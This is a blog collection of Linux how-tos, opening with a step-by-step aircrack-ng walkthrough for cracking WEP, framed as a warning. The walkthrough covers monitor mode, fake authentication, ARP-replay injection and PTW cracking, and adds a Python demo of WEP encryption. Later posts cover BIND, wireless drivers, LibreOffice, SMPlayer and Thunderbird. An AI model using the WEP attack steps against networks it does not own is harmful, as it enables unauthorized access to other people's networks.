Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP TO SECURE YOUR ROUTER!

I have noticed (while connecting to my own AP) that many people around here still use WEP encryption, and it made me dizzy… After counting to 10 I decided to write this up:

This is NOT a “how to crack WEP” tutorial. This is a warning. A warning that should be read as “Wow! This WEP stuff is really not secure… I had better switch my router to WPA2-Personal right away…”. Please do not use this knowledge to do illegal things. I used my own wireless router in my own wireless network for this demonstration. Breaking into WEP-secured networks that You do not own or have explicit permission to test is illegal. You have been warned.

0) Install aircrack-ng-svn from the Arch Linux AUR (BackTrack already ships aircrack-ng).

FIRST WINDOW:

1) Check the name of the wireless interface

iwconfig

says it’s wlan0

2) Check mac address of wlan0

ifconfig wlan0

says YY:YY:YY:YY:YY:YY

3) Optional – not necessary under BackTrack. Kill network managers and other processes that would interfere with the capture:

airmon-ng check kill

Example:

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
23899   ifplugd
Killing all those processes…

4) Create a monitor-mode interface on top of wlan0:

airmon-ng start wlan0

5) Check the name of the wireless monitor mode interface

iwconfig

says it’s mon0

6) Start sniffing to find the router’s BSSID and channel:

airodump-ng mon0

Stop airodump with CTRL + C

Information gathered:

Router’s BSSID: XX:XX:XX:XX:XX:XX
Router’s ESSID: Arch_Linux_User

    INFO: If the ESSID contains spaces, quote it in the following commands, i.e. "Arch Linux User" or 'Arch Linux User'.

Router’s CHANNEL: ZZ

7) Stop the mon0 interface:

airmon-ng stop mon0

8) Start mon0 again, fixed on the AP’s channel:

airmon-ng start wlan0 ZZ

9) Now rewrite the sniffing command so that it only captures the AP’s channel / BSSID and writes the captured packets to a file:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX -w ./output mon0

    IF You get “Fixed channel mon0: -1” in the top right corner of the sniffer, rewrite Your command by adding --ignore-negative-one, so it looks like this:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX  --ignore-negative-one -w ./output mon0

    Leave this command running and saving packets.

SECOND WINDOW:

10) Check if the card is capable of packet injection:

aireplay-ng -9 mon0

    16:10:47  Injection is working!

11) Fake-authenticate Your card with the router (WEP uses Open System authentication, so the AP accepts any client that asks; this step is only needed because the AP discards frames from a MAC that is not associated):

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

    if You get this error:

16:20:36 Waiting for beacon frame (XX:XX:XX:XX:XX:XX) on channel -1
15:38:33  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch.

    just rewrite Your command by adding the "--ignore-negative-one" switch.

Example:

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

This command will (should) authenticate You with the router and then return to the prompt.

0 – the reassociation delay in seconds: 0 authenticates once and exits; a non-zero value (anything up to 512 is worth experimenting with) re-authenticates every that many seconds so the association does not time out
-e router’s ESSID
-a router’s BSSID
-h Your card’s MAC address
--ignore-negative-one fixes the above mentioned error

IF You want to stop this command use CTRL + C

16:16:28  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1

16:16:28  Sending Authentication Request (Open System) [ACK]
16:16:28  Authentication successful
16:16:28  Sending Association Request [ACK]
16:16:28  Association successful :-) (AID: 1)

:-) now fiddle with the “0” in the command – change it to something between 1 and 512 so that aireplay-ng keeps re-authenticating instead of exiting.

Example:

aireplay-ng -1 1 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

    Leave this command running.

THIRD WINDOW:

12) Start the ARP request replay attack (this is what generates the traffic the cracker needs: every replayed ARP request makes the AP re-broadcast it encrypted under a fresh IV):

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

    If You get these errors:

16:21:36  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
16:21:36  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

    rewrite the command by adding the "-e Arch_Linux_User" and "--ignore-negative-one" switches.

Example:

aireplay-ng -3 -e Arch_Linux_User -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

Meanwhile You can (but do not have to) fiddle with the aireplay-ng -1 command in the second window. Change the delay “0” to different values between 1 and 512 and see which works best for You… Sometimes 1 will do juuuust fine.

    After a while aireplay-ng _should_ see an ARP request… and… START REPLAYING IT. Watch the #Data column in the airodump-ng window: it should now climb quickly (typically hundreds of packets per second), each packet carrying a fresh IV.

FOURTH WINDOW:

13) Once airodump-ng has collected enough data packets (with the PTW attack roughly 20 000 IVs for a 64-bit key and 40 000 or more for a 128-bit key) You can start the cracking process:

aircrack-ng -z ./output*.cap

-z selects the PTW attack, which is what makes this fast. Soon after that You should see this sort of message:

KEY FOUND! [ 2C:BD:3D:AC:D5:97:59:57:28:CE:3C:B9:F5 ]
Decrypted correctly: 100%
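What does “Decrypted correctly: 100%” actually mean, and why does the ARP replay help? As an added example (not part of the original post, and not aircrack-ng’s own code), here is WEP’s frame encryption in plain Python together with the key check aircrack-ng performs on the captured frames: decrypt each one with the candidate key and see whether its CRC-32 ICV verifies. The key, IVs and payloads are constructed for the demo; the RC4, IV||key and ICV construction are WEP as specified.

```python
# Added example (not from the original post): how the WEP key check works.
# aircrack-ng does not know the key is right because the AP said so; it
# decrypts captured frames with the candidate key and checks each frame's
# CRC-32 ICV. WEP = RC4(IV || key) XOR (payload || CRC32(payload)), with the
# 3-byte IV sent in the clear in front of every frame.
# The key, IVs and payloads below are constructed for this demonstration.
import zlib
from typing import Optional

IV_BITS = 24  # the root problem: only 2^24 IVs, then keystreams repeat


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA + PRGA). WEP uses it as-is with IV||key as the key."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Return IV || RC4(IV||key) XOR (payload || ICV). key is 5 or 13 bytes."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("WEP wants a 3-byte IV and a 40- or 104-bit key")
    icv = zlib.crc32(payload).to_bytes(4, "little")
    body = payload + icv
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Decrypt one frame with a candidate key; return the payload, or None if
    the ICV does not verify (a wrong key gives random bytes, CRC matches ~2^-32)."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key, len(body)))
    payload, icv = plain[:-4], plain[-4:]
    if zlib.crc32(payload).to_bytes(4, "little") != icv:
        return None
    return payload


def decrypted_correctly(key: bytes, frames) -> float:
    """Percentage of frames whose ICV verifies under key: the figure printed
    next to KEY FOUND!. 100% confirms the key, ~0% is a wrong candidate."""
    ok = sum(wep_decrypt(key, f) is not None for f in frames)
    return 100.0 * ok / len(frames)


def iv_space_exhausted_after(frames_per_second: float) -> float:
    """Seconds until an AP has used every IV once and must reuse keystreams.
    The ARP replay in step 12 drives this rate up on purpose."""
    return (1 << IV_BITS) / frames_per_second


# Constructed demo key and frames (13-byte key = the "128-bit" WEP everyone used).
DEMO_KEY = bytes.fromhex("0123456789ABCDEF0123456789")
WRONG_KEY = bytes.fromhex("0123456789ABCDEF0123456788")
DEMO_PAYLOAD = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"ARP request body"  # LLC/SNAP + data
DEMO_FRAMES = [wep_encrypt(DEMO_KEY, n.to_bytes(3, "big"), DEMO_PAYLOAD) for n in range(50)]

if __name__ == "__main__":
    print(f"right key: Decrypted correctly: {decrypted_correctly(DEMO_KEY, DEMO_FRAMES):.0f}%")
    print(f"wrong key: Decrypted correctly: {decrypted_correctly(WRONG_KEY, DEMO_FRAMES):.0f}%")
    print(f"IV space used up after {iv_space_exhausted_after(500) / 3600:.1f} h at 500 frames/s")
```

The check is cheap because the ICV is an unkeyed CRC-32 sitting under the same keystream as the data: a candidate key is confirmed or rejected with a handful of frames, which is why aircrack-ng can test key bytes statistically and verify them in seconds. The same property is what lets an attacker flip bits in a WEP frame and fix up the CRC without knowing the key.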

That’s it… You’re all done…

It takes less than 5 minutes to crack a WEP key… 5 minutes, guys and girls… and Your wireless network has been compromised… Now please tell me that You have at least changed the default administrator’s password on the router? Please, please tell me You did at least that…

Cheers.

AndrzejL

[PCLinuxOS] Manually upgrading Bind / Named to version 9.9.2-P2 [Security patches].

Hi folks.

The latest BIND / named version was released several days ago to patch a security vulnerability.

I will show how to download, extract, configure and install the latest version.

Open terminal window and follow this set of instructions:

su

root's password

export PREFIX=/usr

export PATH=$PREFIX/bin:$PATH

export PKG_CONFIG_PATH=$PREFIX/lib/pkgconfig:$PREFIX/share/pkgconfig

cd /opt/

mkdir Bind

cd Bind

wget -c ftp://ftp.isc.org/isc/bind9/9.9.2-P2/bind-9.9.2-P2.tar.gz

ISC publishes a detached PGP signature (.asc) alongside each tarball; this download is plain FTP, so verify the signature against ISC’s release-signing key before building.

tar xvzf ./bind-9.9.2-P2.tar.gz

cd bind-9.9.2-P2

./configure --prefix=$PREFIX --sysconfdir=/etc/

You can expect missing dependencies here. I had no problems whatsoever as I have a good few “devel” packages installed. If You do run into a snag, figure out what You are missing, install it from Synaptic (without closing this window) and re-run the configure step above until there are no errors.

make

make install

ls --full-time /var/lib/named/var/

one of the listed items should look like this (PCLinuxOS runs named chrooted under /var/lib/named; after make install the directory is owned by root):

drwxr-xr-x 7 root root 4096 2013-03-22 09:08:02.163308440 +0100 named/

Give it back to the named user and check again:

chown named:named /var/lib/named/var/named/

ls --full-time /var/lib/named/var/

drwxr-xr-x 7 named named 4096 2013-03-22 09:08:08.221303100 +0100 named/

Now in this terminal window type in

named -v

the reply should look like this:

BIND 9.9.2-P2

Note that named -v only tells You which binary comes first in Your PATH; the daemon that is actually answering queries is still the old one until it is restarted:

service named restart

and the reply should look something like this:

Stopping named: [ Failed ]
Starting named: [ OK ]

Confirm that the running daemon is the new one as well, for example by querying it for version.bind in the CHAOS class or by checking which executable the named process was started from. This should be it… You have compiled and are running the latest patched version of BIND…

Regards.

Andy

[Arch Linux] Solving the ieee80211 xyz0: abc0: No probe response from AP xx:yy:zz:aa:bb:cc after 500ms, disconnecting – wireless dropouts.

Hi all.

I have this Belkin rt73usb card. It’s connected to a SUPER OLD Thinkpad 600E, it is always associated with only one router, static IP setup, and the laptop is stationary / never moved. I had some problems connecting it to the network at boot time, but thanks to Boohbah from the #Archlinux channel and a bit of research I got it to connect, to turn off power management and to keep the rate “fixed” at 54M. That worked well BUT… there was one problem: the connection stayed up, I could browse the internet from the Thinkpad, I could access the sshfs share on my server (from the Thinkpad 600E) and so on, but after a while the sshd port (50505 in my case) would switch from open to filtered and I could not connect to it anymore.

Example: I rebooted the Thinkpad 600E and could ssh in; the Thinkpad was then left alone for sometimes 10 minutes, sometimes an hour; its connection was still active but I could not ssh to the machine anymore.

After a bit of investigating I found this line in dmesg (after the connection dropped):

ieee80211 xyz0: abc0: No probe response from AP xx:yy:zz:aa:bb:cc after 500ms, disconnecting

I googled it but could not find a solution, so I asked for help on the Arch Linux forum and Strike0 sorted me out in no time. Thanks, dude!

I am reposting the info here just in case the forum post goes missing in the future. To solve this issue I had to do this:

As root add:

options rt73usb nohwcrypt=1

to the file:

/etc/modprobe.d/modprobe.conf

and save it. nohwcrypt=1 makes the driver leave WEP/WPA encryption to mac80211 in software instead of the dongle’s hardware; the cipher is the same, only where it runs changes. Then regenerate the initramfs with

mkinitcpio -p linux

and reboot.

Hope someone will find it useful in the future.

Regards.

Andrzej

[Arch Linux] Bloody RT73 USB dongle wouldn't connect at boot time.

Hi all.

I own this dongle:

Bus 001 Device 003: ID 148f:2573 Ralink Technology, Corp. RT2501/RT2573 Wireless Adapter

It’s plugged in to my “stationary” IBM Thinkpad 600E laptop. Only one network. Static IP. It would connect to the internet once the system was fully booted, but not during boot.

BIG thanks to Boohbah, he sorted me out when I was losing all hope…

To solve this issue I had to do this (as root). The unit below assumes /etc/wpa_supplicant.conf already contains the network’s credentials; since it holds the PSK in clear text, keep it readable by root only.

Create two files:

/etc/systemd/system/network@wlan0.service

With content:

[Unit]
Description=Network Connectivity (%i)
Wants=network.target
Before=network.target
BindsTo=sys-subsystem-net-devices-%i.device
After=sys-subsystem-net-devices-%i.device

[Service]
Type=oneshot
RemainAfterExit=yes
EnvironmentFile=/etc/conf.d/network
ExecStart=/sbin/ip link set dev ${interface} up
ExecStart=/usr/sbin/wpa_supplicant -B -i ${interface} -c /etc/wpa_supplicant.conf
ExecStart=/sbin/ip addr add ${address}/${netmask} broadcast ${broadcast} dev ${interface}
ExecStart=/sbin/ip route add default via ${gateway}
ExecStart=/usr/sbin/iwconfig ${interface} power off
ExecStart=/usr/sbin/iwconfig ${interface} rate 54M fixed
ExecStop=/sbin/ip addr flush dev ${interface}
ExecStop=/sbin/ip link set dev ${interface} down

[Install]
WantedBy=multi-user.target

and

/etc/conf.d/network

with content:

interface=wlan0
address=192.168.0.102
netmask=24
broadcast=192.168.0.255
gateway=192.168.0.1

Your IP / gateway may vary. You will also have to edit file:

/etc/resolv.conf

So it contains DNS servers that You’re using. Example:

nameserver 192.168.0.1

and then enable service:

systemctl enable network@wlan0.service

and reboot.

After the reboot my card was connected.

[root@wishthinkpad andrzejl]# journalctl -b | grep wlan0
Jan 05 04:31:50 wishthinkpad.loc systemd[1]: Expecting device sys-subsystem-net-devices-wlan0.device…
Jan 05 04:32:03 wishthinkpad.loc systemd[1]: Starting Network Connectivity (wlan0)…
Jan 05 04:32:03 wishthinkpad.loc kernel: IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
Jan 05 04:32:04 wishthinkpad.loc systemd[1]: Started Network Connectivity (wlan0).
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: authenticate with 00:18:39:a0:db:3e
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: send auth to 00:18:39:a0:db:3e (try 1/3)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: authenticated
Jan 05 04:32:06 wishthinkpad.loc kernel: rt73usb 1-1.1:1.0: wlan0: disabling HT as WMM/QoS is not supported
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: associate with 00:18:39:a0:db:3e (try 1/3)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: RX AssocResp from 00:18:39:a0:db:3e (capab=0x411 status=0 aid=1)
Jan 05 04:32:06 wishthinkpad.loc kernel: wlan0: associated
Jan 05 04:32:06 wishthinkpad.loc kernel: IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[root@wishthinkpad andrzejl]#

Thanks again Boohbah I wouldn’t be able to solve that without You.

Hopefully someone else can use it in the future.

Regards.

Andrzej

EDIT 01: Adding pci=noacpi as a kernel parameter seems to make this temperamental USB device behave slightly better…

Cool trick – speeding up LibreOffice by pre-loading it during boot.

Hi all.

I have decided to speed up opening of the LibreOffice and its components by pre-loading it after I log into my system.

This is not a trick for people with low-RAM machines. Why? It pre-loads LibreOffice on login and keeps it in memory, so unless You are willing to sacrifice something between 64 and 256 MB of RAM this how-to is not for You.

Still interested? Great. Do this:

Open terminal and run those commands:

touch ~/.config/autostart/preload_libreoffice.sh

chmod +x ~/.config/autostart/preload_libreoffice.sh

mcedit ~/.config/autostart/preload_libreoffice.sh

Now copy this:

#!/bin/sh
# wait for the desktop to settle, then start LibreOffice without opening a document
sleep 15
loffice --nodefault --nologo &
PID=$!
# give it time to load its libraries into memory, then close it again
sleep 10
kill $PID

Click on the mcedit window and press SHIFT + INS(ERT); the clipboard content is pasted into mcedit. Press F2 to save, then F10 to quit.

Mcedit - Saving the script

Close the terminal and open any part of LibreOffice (Writer, Calc, Draw, whatever You like…) and click Tools > Options from the menu bar. In the LibreOffice section find and click Memory. See the “Use for LibreOffice” box? Change its value to something like 64, 128 or 256. Now OK the Options window and close LibreOffice.

LibreOffice - Memory Settings

Now reboot Your machine and log in. Give it some time (15 seconds) to run the script in the background, then try opening a LibreOffice component… It should start in less than 1 second.

Regards.

Andrzej

[Arch Linux] Playing DVD Videos in SMPlayer. Adding SMPlayer entry in KDE's Device Notifier.

Hi folks.

I have installed Arch Linux few days ago. I am loving it.

By default SMPlayer won’t play DVD videos, nor will it have an entry in the KDE4 Device Notifier to do so. Here is how I got it to work:

I assume You have a fully upgraded system.

Run this:

su

Now give it root’s password.

Now run this:

pacman -S smplayer libdvdcss libdvdnav libdvdread

and agree to install all the packages and their dependencies.

Now run this:

mcedit /etc/udev/rules.d/82-cdrom.rules

and paste this as a content:

SUBSYSTEM=="block", KERNEL=="sr0", SYMLINK+="cdrom cdrw dvd dvdrw"

Big thank You to sudokode for helping me with the udev rule.

Now save the file and close editor (F2 to save, F10 to exit). You can use any other text editor like vi, nano etc.

Now if You’re not using KDE4 and You do not need or want the Device Notifier entry You can reboot. SMPlayer will be able to play Your dvd videos now.

For those that want and need the Device Notifier entry please continue in the same terminal.

Run this:

mkdir -p /usr/share/apps/solid/actions/

mcedit /usr/share/apps/solid/actions/smplayer_play_dvd.desktop

and paste this:

[Desktop Entry]
Type=Service
Actions=PlayDVD;
X-KDE-Solid-Predicate=OpticalDisc.availableContent & 'VideoDvd'

[Desktop Action PlayDVD]
Name=Play DVD with SMPlayer
Exec=smplayer dvd://%U
Icon=smplayer

Now save the file and close editor (F2 to save, F10 to exit). You can use any other text editor like vi, nano etc.

Reboot Your machine.

Now when You insert a DVD disc into the drive, the Device Notifier will ask You what You want to do. One of the options should be “Play DVD with SMPlayer”.

Regards.

Andrzej

Testing Mozilla Thunderbird Central Daily 20 safely on PCLinuxOS 2012.x

Hi all.

I wanted to test the latest version of the e-mail client from Mozilla. I am a huge fan of Thunderbird and it has always been my main e-mail client. PCLinuxOS comes with the latest stable version. It’s a good thing; I love the stability of my distribution. However, I want to try the newest Mozilla product before it becomes the default for PCLinuxOS. I also want to help the Mozilla developers by filing bug reports and making their products even better this way.

Here are a few simple steps You can follow if You want to test it too.

Thunderbird is a default PCLinuxOS e-mail client so its installed by default. If You removed it – reinstall it via synaptic.

The older version must stay installed for a few minor yet important reasons.

Close Thunderbird completely. Now open console and run these commands:

cd

Go to Your home folder.

This version of Thunderbird is a bleeding-edge release, so the ride might be a little bumpy. I never noticed any problems, but just to be on the safe side…

cp -R ~/.thunderbird ~/.thunderbird.backup.20

back up Your profile first.

wget -c http://ftp.mozilla.org/pub/mozilla.org/thunderbird/nightly/latest-comm-central/thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Download the compressed Daily XX file (this is plain HTTP with no signature check, so You are trusting the network path as much as Mozilla here).

tar -xvjf ./thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Extract it.

rm -f ./thunderbird-20.0a1.en-US.linux-i686.tar.bz2

Remove it.

su

Gain root privileges…

root password

…by giving correct root password.

rm -f /usr/bin/thunderbird

Remove old executable.

rm -f /usr/bin/mozilla-thunderbird

Remove old executable.

ln -s /home/yourlogin/thunderbird/thunderbird /usr/bin/thunderbird

ln -s /home/yourlogin/thunderbird/mozilla-thunderbird /usr/bin/mozilla-thunderbird

Create symlinks from the system paths to the new executables in Your home folder. Replace yourlogin with Your actual login. Two things to be aware of: the system-wide command now runs a binary that lives in a user-writable directory, so anything that can write to Your home can change what every user of this machine runs (fine on a single-user desktop, not on a shared one); and the files no longer match what the package database says, so the next Thunderbird package update will overwrite the symlinks, which is also exactly how the “going back” step below works.

exit

exit

Go back to user mode and close the console.

Now You can use the old shortcuts (from the desktop, panel or KMenu) to open new Thunderbird. All the programs should open the mailto: links in new version of Thunderbird too.

Enjoy the latest and greatest from Mozilla. I am. If You are using Daily You should know that it can also be safely upgraded to the latest build by using Help > About Daily from the Thunderbird menu bar.

Thunderbird 20 Daily on PCLinuxOS 2011.x

Going back to the repo version of Thunderbird.

Close Thunderbird completely. Reinstall Thunderbird using Synaptic.

Regards.

Andy